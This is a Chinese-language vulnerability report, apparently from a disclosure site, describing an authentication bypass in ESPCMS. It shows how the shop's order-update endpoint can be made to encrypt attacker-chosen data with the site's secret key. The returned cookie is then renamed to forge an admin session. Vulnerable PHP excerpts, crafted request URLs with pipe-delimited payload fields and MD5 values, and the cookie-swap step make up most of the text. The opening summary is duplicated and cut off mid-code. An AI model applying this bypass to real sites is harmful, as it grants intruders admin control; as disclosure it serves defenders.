### 简要描述: 另类利用Espcms的加解密函数,绕过后台所有模块的权限验证 额。。。解释起来比较长,算是一种思路 ### 详细说明: 后台权限验证的类文件:\public\class_connector.php ``` function admin_purview() { if ($this->fun->accept('archive', 'R') == 'filemanage' && $this->fun->accept('action', 'R') == 'batupfilesave') { $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'G'); $esp_powerlist = $this->fun->accept('esp_powerlist', 'G'); $gettype = false; } else { $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'C'); $esp_powerlist = $this->fun->accept('esp_powerlist', 'C'); $gettype = true; } $arr_purview = explode('|', $this->fun->eccode($ecisp_admininfo, 'DECODE', db_pscode)); ``` 关键代码解释: 我们如果知道db_pscode的值的话就可以任意构造$ecisp_admininfo了,但是不可能 db_pscode在网站初始化的时候就已经设定,并且是随机生成的32字符串 define('db_pscode', '5ae8d385e6ae4a4f633cacd28'); 换个思路: 程序中其他的文件会用到加密函数,如果这个需要加密的变量可控,而且加密后的密文我们可以拿到。这样就相当于让程序帮我们构造找我们需要的加密数据了。 最终找到一个文件符合以上的需求\interface\order.php: ``` function in_orderupdae() { $bprice = $this->fun->accept('bprice', 'P'); $didlist =...
### 简要描述: 另类利用Espcms的加解密函数,绕过后台所有模块的权限验证 额。。。解释起来比较长,算是一种思路 ### 详细说明: 后台权限验证的类文件:\public\class_connector.php ``` function admin_purview() { if ($this->fun->accept('archive', 'R') == 'filemanage' && $this->fun->accept('action', 'R') == 'batupfilesave') { $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'G'); $esp_powerlist = $this->fun->accept('esp_powerlist', 'G'); $gettype = false; } else { $ecisp_admininfo = $this->fun->accept('ecisp_admininfo', 'C'); $esp_powerlist = $this->fun->accept('esp_powerlist', 'C'); $gettype = true; } $arr_purview = explode('|', $this->fun->eccode($ecisp_admininfo, 'DECODE', db_pscode)); ``` 关键代码解释: 我们如果知道db_pscode的值的话就可以任意构造$ecisp_admininfo了,但是不可能 db_pscode在网站初始化的时候就已经设定,并且是随机生成的32字符串 define('db_pscode', '5ae8d385e6ae4a4f633cacd28'); 换个思路: 程序中其他的文件会用到加密函数,如果这个需要加密的变量可控,而且加密后的密文我们可以拿到。这样就相当于让程序帮我们构造找我们需要的加密数据了。 最终找到一个文件符合以上的需求\interface\order.php: ``` function in_orderupdae() { $bprice = $this->fun->accept('bprice', 'P'); $didlist = $this->fun->accept('did', 'P'); $amountlist = $this->fun->accept('amount', 'P'); foreach ($didlist as $key => $value) { $arraykeyname = 'k' . $value; $amount = intval($amountlist[$key]); $orderlist[$arraykeyname] = array('did' => $value, 'amount' => $amount); } $orderlist_ser = serialize($orderlist); $this->fun->setcookie('ecisp_order_list', $this->fun->eccode($orderlist_ser, 'ENCODE', db_pscode), 7200); ``` 通过代码我们可以看到$orderlist有可能可以被我们控制,为了说明方便加段代码输出: ``` function in_orderupdae() { $bprice = $this->fun->accept('bprice', 'G'); $didlist = $this->fun->accept('did', 'G'); $amountlist = $this->fun->accept('amount', 'G'); foreach ($didlist as $key => $value) { $arraykeyname = 'k' . $value; $amount = intval($amountlist[$key]); $orderlist[$arraykeyname] = array('did' => $value, 'amount' => $amount); } $orderlist_ser = serialize($orderlist); $this->fun->setcookie('ecisp_order_list', $this->fun->eccode($orderlist_ser, 'ENCODE', db_pscode), 7200); $ecisp_admininfo = $this->fun->eccode($orderlist_ser, 'ENCODE', db_pscode); $arr_purview = explode('|', $this->fun->eccode($ecisp_admininfo, 'DECODE', db_pscode)); list($this->esp_adminuserid, $this->esp_username, $this->esp_password, $this->esp_useragent, $this->esp_powerid, $this->esp_inputclassid, $this->esp_softurl) = $arr_purview; print_r($arr_purview); echo "<br />"; echo "esp_adminuserid->".$this->esp_adminuserid."<br />"; echo "esp_username->".$this->esp_username."<br />"; echo "esp_softurl->".$this->esp_softurl."<br />"; echo "esp_useragent->".$this->esp_useragent;;die(); ``` 构造url: http://127.0.0.1/index.php?ac=order&at=orderupdae&bprice=anb&did[aa]=87|dcc|ccc|a1|a2|a3|a4|a5&amount=1 最终输出的结果为: ``` Array ( [0] => a:1:{s:26:"k87 [1] => dcc [2] => ccc [3] => a1 [4] => a2 [5] => a3 [6] => a4 [7] => a5";a:2:{s:3:"did";s:25:"87 [8] => dcc [9] => ccc [10] => a1 [11] => a2 [12] => a3 [13] => a4 [14] => a5";s:6:"amount";i:1;}} ) esp_adminuserid->a:1:{s:26:"k87 esp_username->dcc esp_softurl->a4 esp_useragent->a1 ``` 再返回之前admin_purview权限验证的函数对比,此时esp_adminuserid满足不为空,esp_username也满足不为空,esp_softurl和esp_useragent都是可控的。 esp_softurl代表网站后台的路径,esp_useragent代表本机agent值,都是可知的。用md5加密下。 最后构造的URL: http://127.0.0.1/index.php?ac=order&at=orderupdae&bprice=anb&did[aa]=87|dcc|ccc|5f4f40bac141a48d05a94ac90514fe05|a2|a3|c8273f6a0177588459b1971c65829cc6|a5&amount=1 [<img src="https://images.seebug.org/upload/201305/14220725a2c988c255e9d810f0c9a56f2e454aef.jpg" alt="g.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/14220725a2c988c255e9d810f0c9a56f2e454aef.jpg) 把cookie中ecisp_order_list改为ecisp_admininfo 访问后台地址: [<img src="https://images.seebug.org/upload/201305/142210127a15f5bcc6a96f7212c32f6e354b1bb0.jpg" alt="i.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/142210127a15f5bcc6a96f7212c32f6e354b1bb0.jpg) ### 漏洞证明: 下面显示Cookie err,木问题,点其他连接都是OK的 [<img src="https://images.seebug.org/upload/201305/142212206468038204590af773ce689daa809852.jpg" alt="j.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201305/142212206468038204590af773ce689daa809852.jpg)
